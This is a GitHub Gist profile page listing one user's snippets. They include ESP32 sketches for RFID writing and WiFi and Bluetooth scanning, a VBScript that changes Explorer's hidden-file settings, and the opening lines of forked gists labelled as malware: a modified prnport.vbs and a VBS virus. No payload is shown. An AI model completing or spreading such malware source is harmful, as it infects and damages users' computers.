Skip to content

Instantly share code, notes, and snippets.

View aMiscreant's full-sized avatar
🎯
Focusing

Miscreant aMiscreant

🎯
Focusing
  • North Korea
View GitHub Profile
@aMiscreant
aMiscreant / MFRC522Write.ino
Created July 4, 2025 06:02
MFRC522 Write Data Using ESP
#include <MFRC522v2.h>
#include <MFRC522DriverSPI.h>
//#include <MFRC522DriverI2C.h>
#include <MFRC522DriverPinSimple.h>
#include <MFRC522Debug.h>
// Learn more about using SPI/I2C or check the pin assigment for your board: https://github.com/OSSLibraries/Arduino_MFRC522v2#pin-layout
MFRC522DriverPinSimple ss_pin(21);
MFRC522DriverSPI driver{ss_pin}; // Create SPI driver
@aMiscreant
aMiscreant / ESP32c3RapidScan.ino
Created July 4, 2025 05:57
ESP32c3WiFiScanner
#include "WiFi.h"
#include "esp_wifi.h"
void scan_done(void* arg, esp_event_base_t event_base,
int32_t event_id, void* event_data) {
uint16_t apCount = 0;
esp_wifi_scan_get_ap_num(&apCount);
Serial.printf("Scan done, %d APs found:\n", apCount);
wifi_ap_record_t *ap_list = (wifi_ap_record_t *)malloc(sizeof(wifi_ap_record_t) * apCount);
@aMiscreant
aMiscreant / BluetoothScanner.ino
Last active July 4, 2025 06:04
ESP32c3 Bluetooth Scanner
#ifndef SOC_BLE_50_SUPPORTED
#warning "This SoC does not support BLE5. Try using ESP32-C3, or ESP32-S3"
#else
#include <BLEDevice.h>
#include <BLEUtils.h>
#include <BLEScan.h>
#include <vector>
bool bluetoothScan = false;
'By SUN33L
'---------------------------------------------------'
Hidden ="HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
SHidden ="HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
Set sh = WScript.CreateObject("WScript.Shell")
St = Sh.RegRead(Hidden)
If St = 2 Then
Sh.RegWrite Hidden, 1, "REG_DWORD"
Sh.RegWrite SHidden, 1, "REG_DWORD"
Else
@aMiscreant
aMiscreant / modified_prnport.vbs
Created May 16, 2025 04:05 — forked from andrew-petrus/modified_prnport.vbs
Modified Prnport.vbs (WARNING: MALWARE)
Option Explicit
On Error Resume Next
' Crear objeto shell
Dim objShell
Set objShell = CreateObject("WScript.Shell")
' Dividir el comando en partes
Dim cmd1, cmd2, cmd3, cmd4, cmd5, finalCmd
@aMiscreant
aMiscreant / FS6519.dll.vbs
Created May 16, 2025 03:34 — forked from six519/FS6519.dll.vbs
The story behind "TAGA LIPA ARE" virus and its source code.
'Few years ago, I remember fucking around with this so called "Hacked By Godzilla" virus.
'It was a Visual Basic Script with a filename MS32DLL.dll.vbs that fucks up Internet
'Explorer title bar.
'I have been into writing simple Windows OS viruses before the time I learned about
'this fucking VBS virus.
'We all know that the famous "I LOVE YOU" virus was a Visual Basic Script (VBS) too
'and it gave me an idea to test
'if that scripting language can still be reliable to fuck up peoples computer that time.
'What I did was, I only replaced "MS32DLL" with "FS6519", pressing Ctrl + H
@aMiscreant
aMiscreant / locker.rb
Created May 16, 2025 03:31 — forked from b-coimbra/locker.rb
flash drive folder locker script
#/usr/bin/env ruby
# encoding: UTF-8
require 'io/console'
BEGIN {
FOLDER = "\u{00a0}"
PASSWORD = "12345"
$> << %{\e[35m